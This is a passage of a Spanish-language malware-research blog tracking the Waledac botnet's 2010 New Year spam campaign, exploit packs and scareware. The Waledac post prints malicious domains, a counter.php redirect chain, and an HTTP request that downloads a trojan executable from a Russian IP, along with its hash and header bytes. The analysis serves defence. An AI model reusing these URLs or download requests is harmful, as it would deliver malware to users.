Founder of MalwareIntelligence, a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

sábado, 2 de enero de 2010

Waledac. Línea de tiempo '07-'09

El troyano waledac, encargado de reclutar zombis para alimentar una botnet dedicada al spam, recientemente volvió a dar noticia al utilizar como excusa la llegada del nuevo año 2010.

Sin embargo, sus actividades fraudulentas datan desde el año 2007 cuando se lo conoció bajo la nomenclatura de storm, y desde entonces, esta familia de malware se ha aprovechado de Ingeniería Social como principal estrategia de propagación bajo diversas coberturas.

La presente línea de tiempo abarca desde las primeras actividades de Ingeniería Social hasta la última y recientemente conocida, relacionda al inicio del 2010.


Información relacionada
Waledac vuelve con otra estrategia de ataque
Waledac/Storm. Pasado y presente de una amenaza latente
Masiva campaña de propagación/infección lanzada por Waledac utilizando como excusa el día de la Independencia de EEUU
Estrategia BlackHat SEO propuesta por Waledac
Waledac. Seguimiento detallado de una amenaza latente
Más Waledac en acción ¿Puedes adivinar cuánto te amo gano?
Waledac más amoroso que nunca
Waledac e Ingeniería Social en San Valentín

Jorge Mieres

Ver más

Publicado por Jorge Mieres 0 comentarios

viernes, 1 de enero de 2010

Waledac vuelve con otra estrategia de ataque

Luego de un largo periodo de inactividad, la botnet formada por waledac vuelve a desplegar una estrategia de infección utilizando el patrón que lo caracteriza: Ingeniería Social, que en esta oportunidad aprovecha como cobertura el comienzo del nuevo año.

Las últimas campañas de waledac datan de mediados de año cuando la estrategia de propagación utilizada simulaba ser un video sobre el día de la independencia en EE.UU, alojado en YouTube. De hecho, la actividad más importante durante este año se produjo durante el primer cuatrimestre.

A continuación podemos observar capturas que describen la línea de tiempo de waledac en torno a su actividad durante el 2009.

Sin embargo, quienes se encuentran detrás de waledac nunca se detuvieron y los dominios utilizados recientemente poseen fecha de registro durante todo el periodo de supuesta inactividad.

Cada página utilizada para la propagación posee un script ofuscado con instrucciones para ser ejecutadas de forma automática en el equipo víctima. De esta manera, se explota una debilidad y automáticamente se descarga y ejecuta el malware, convirtiendo el equipo en un nodo más de la botnet, para continuar con sus actividades fraudulentas. A continuación vemos una captura del script.

Dentro del script se encuentra la referencia hacia el archivo counter.php que aloja otro script y desde el cual salta hacia http://diokxbgrqkgg.com/ld/trest1/ y este a http://diokxbgrqkgg.com/nte/trest1.py, en donde se encuentra otro script malicioso.

GET /counter.php HTTP/1.1
Host: aju.nonprobs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://aju.nonprobs.com/2010.html

En esta instancia, descarga y ejecuta un archivo llamado "ny_foroplay.exe" (MD5: df2d6f835ad6e5276b1b1ffe73170070) desde la dirección IP 95.169.190.208 alojada en Rusia.

Cabe aclarar que este malware posee un muy bajo índice de detección, siendo detectado hasta el momento sólo por 6 compañías antivirus de un total de 40. Reporte de VT.

GET /pr/pic/ny_foroplay.exe HTTP/1.0
Host: 95.169.190.208

HTTP/1.0 200 OK
Age: 1542
Date: Fri, 01 Jan 2010 19:22:58 GMT
Content-Length: 416256
Content-Type: application/octet-stream
Server: nginx/0.8.15
Last-Modified: Fri, 01 Jan 2010 19:22:58 GMT

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$.........y.=u..=u..=u...u..u..

Waledac ha vuelto con una nueva excusa, aunque a juzgar por el porcentaje de actividad que posee el servidor donde se encuentra alojado, todo indica que siempre se mantuvo latente con actividades muy esporádicas. Incluso, teniendo en cuenta la estructura de carpetas desde la cual se descarga, parecería haber una relación directa con otra amenaza bastante conocido que es Bredolab, y a la cual aparentemente también asocian con algunos scareware y ZeuS.

Información relacionada
Waledac/Storm. Pasado y presente de una amenaza latente
Masiva campaña de propagación/infección lanzada por Waledac utilizando como excusa el día de la Independencia de EEUU
Estrategia BlackHat SEO propuesta por Waledac
Waledac. Seguimiento detallado de una amenaza latente
Más Waledac en acción ¿Puedes adivinar cuánto te amo gano?
Waledac más amoroso que nunca
Waledac e Ingeniería Social en San Valentín

Jorge Mieres

Ver más

Publicado por Jorge Mieres 0 comentarios

jueves, 31 de diciembre de 2009

Compendio mensual de información. Diciembre 2009

Pistus Malware Intelligence - English version

28.12.09 Exploit Pack y su relación con el rogue
27.12.09 Testimonios sobre scareware y estrategia de credibilidad
25.12.09 Siberia Exploit Pack. Otro paquete de explois In-the-Wild
24.12.09 Anti-Virus Live 2010. Chateando con el enemigo
20.12.09 Una recorrida por los últimos scareware XIX
15.12.09 RussKill. Aplicación para realizar ataques de DoS
09.12.09 Fusión. Un concepto adoptado por el crimeware actual II
05.12.09 Campaña de desinformación para propagar malware
03.12.09 Una breve mirada al interior de Fragus
01.12.09 Campaña de propagación de Koobface a través de Blogspot

Malware Disasters Team - A division of Malware Intelligence
26.12.09 Desktop Hijack by Internet Security 2010. Your System Is Infected!
14.12.09 LockScreen. Your computer is infected by Spyware!!!
13.12.09 Waledac/Storm. Past and present a threat
13.12.09 Symbiosis malware present. Koobface
05.12.09 Swizzor reload. Adware and control of P2P networks

Evil Fingers Blog
25.12.09 Anti-Virus Live 2010. Talking with the enemy
17.12.09 RussKill. Application to perform denial of service attacks
10.12.09 Fusion. A concept adopted by the current crimeware II
06.12.09 Disinformation campaign to spread malware
04.12.09 A brief glance inside Fragus
01.12.09 Koobface campaign spread through Blogspot

Offensive Computing
27.12.09 Siberia Exploit Pack. Another package of explois In-the-Wild
17.12.09 RussKill. Application to perform denial of service attacks
05.12.09 DDoS Botnet. New crimeware particular purpose

ESET Latinoamérica Blog
29.12.09 ZeuS utiliza el nombre de ESET NOD32 para reclutar zombis
24.12.09 Vuelven a dar batalla dos conocidos adware
23.12.09 Neon Exploit System. Un viejo crimeware aún In-the-Wild
12.12.09 ZeuS utiliza el nombre de Amazon para reclutar zombis
03.12.09 Entrevista sobre el spam
02.12.09 Koobface vuelve al ataque en navidad


Información relacionada
Compendio mensual de información 2009

Diciembre - Noviembre - Octubre - Septiembre - Agosto - Julio
Junio - Mayo - Abril - Marzo - Febrero - Enero

Jorge Mieres

Ver más

Publicado por Jorge Mieres 0 comentarios

lunes, 28 de diciembre de 2009

Exploit Pack y su relación con el rogue

Las actividades fraudulentas poseen relación entre sí a través de "asociados" de negocio en el cual cada uno de ellos oficia a modo de célula dentro de una misma estructura orgánica, complementando así una empresa dedicada a tales actividades ilícitas.

En este sentido, el rogue (también denominado scareware), cuenta con un volumen importante de "afiliados" que se encargan de la distribución de los códigos maliciosos. De hecho, un reciente estudio del FBI señaló que las perdidas estimativas a causa del rogue ascienden a USD 150 millones.

Esto demuestra por qué todas aquellas viejas estrategias de Ingeniería Social que muchas veces dejan una sensación de trivialidad aún hoy son muy efectivas; y por qué muchos profesionales del ámbito criminal, que buscan ampliar las actividades delictivas y sus ganancias, migran sus esfuerzos en combinar las estrategias de diseminación con técnicas del tipo BlackHat SEO e incluso, con Exploits Pack como en este caso.

Un caso concreto es el Exploit Pack de reciente aparición denominado Siberia Exploit Pack que dentro de su estructura incorpora un archivo llamado file.exe. Cuando el usuario accede a uno de los dominios utilizados por el crimeware, un exploit (generalmente a través de archivos pdf) se encarga de explotar determinada vulnerabilidad, descargar un malware desde un dominio preestablecido y ejecutarlo.

Una vez que el malware infecta el sistema, realiza un Desktop Hijack mostrando la advertencia de una infección a través del mensaje "YOUR SYSTEM IS INFECTED!".

Luego de ello, el sistema comienza a desplegar ventanas emergentes (característica propia del adware) convirtiendo el sistema en el nido del rogue y punto de referencia de una botnet. Sin embargo, independientemente de la infección, esas ventanas emergentes forman parte de la campaña de engaño y de acción psicológica del malware.

Por un lado, porque el supuesto antivirus instalado lejos de solucionar los problemas, los empeora descargando más códigos maliciosos o abriendo los puertos para que accedan otras amenazas. Por otro lado, porque las advertencias de infección, además de ser agresivas, son completamente falsas, y el objetivo es "asustar" al usuario para que termine "comprando" el falso antivirus.

Información relacionada
Siberia Exploit Pack. Otro paquete de explois In-the-Wild
Anti-Virus Live 2010. Chateando con el enemigo
Una recorrida por los últimos scareware XIX
Scareware. Estrategia de engaño propuesta por Personal Antivirus
Campaña de propagación del scareware MalwareRemovalBot

Jorge Mieres

Ver más

Publicado por Jorge Mieres 0 comentarios

domingo, 27 de diciembre de 2009

Testimonios sobre scareware y estrategia de credibilidad

Una de las estrategias utilizadas por los propagadores de scareware (rogue) es intentar atraer la confianza de los usuarios a través de "testimonios" supuestamente realizados por personas que ya habrían adquirido la "solución" y que por intermedio de estos manifiestan su "gran satisfacción por el mismo".

Sin embargo, sabemos muy bien que sólo es parte de un engaño que busca complementar la estrategia general de propagación/infección, y que si instalamos ese programa vamos a terminar con el sistema infectado por un scareware. En consecuencia, ¿no se preguntan quienes son los que afirman la eficacia de esta falsa herramienta antivirus?

En función de la imagen, donde debajo de cada frase aparece el supuesto nombre (incompleto) del responsable de la misma, quizás podamos deducir que se trata de las señoras y señores:

• Dave C. = Dave Conficker
• Beth P. = Beth Phoenix
• Lisa W. = Lisa Waledac
• Melissa H. = Melissa Hupigon
• Paul M. = Paul Mebroot
• Jason C. = Jason Crum
• Pat J. = Pat Justexploit
• Matt E. = Matt Eleonore
• Roger F. = Roger Fragus
• Sam P. = Sam Piosonivy
• Jamie V. = Jaime Virut
• Tracey K. = Tracey Koobface
• Brian A. = Brian Adrenaline
• Sally V. = Sally Virtumonde
• John R. = John Ransomware
• Lauren R. = Lauren Rustock

El malware siempre tomando "personalidades" como estrategia y cobertura donde sólo ellos podrían hablar maravillas de un colega fraudulento ;-P

Información relacionada
Anti-Virus Live 2010. Chateando con el enemigo
Una recorrida por los últimos scareware XIX
Campaña de desinformación para propagar malware
Campaña de propagación de Koobface a través de Blo...

Jorge Mieres

Ver más

Publicado por Jorge Mieres 0 comentarios

Suscribirse a: Entradas (Atom)